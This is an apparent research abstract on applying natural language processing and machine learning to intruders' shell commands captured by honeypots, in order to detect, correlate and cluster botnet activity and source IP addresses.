Computer security has been plagued by increasing formidable, dynamic,
hard-to-detect, hard-to-predict, and hard-to-characterize hacking techniques.
Such techniques are very often deployed in self-propagating worms capable of
automatically infecting vulnerable computer systems and then building large bot
networks, which are then used to launch coordinated attacks on designated
targets. In this work, we investigate novel applications of Natural Language
Processing (NLP) methods to detect and correlate botnet behaviors through the
analysis of honeypot data. In our approach we take observed behaviors in shell
commands issued by intruders during captured internet sessions and reduce them
to collections of stochastic processes that are, in turn, processed with
machine learning techniques to build classifiers and predictors. Our technique
results in a new ability to cluster botnet source IP address even in the face
of their desire to obfuscate their penetration attempts through rapid or random
permutation techniques.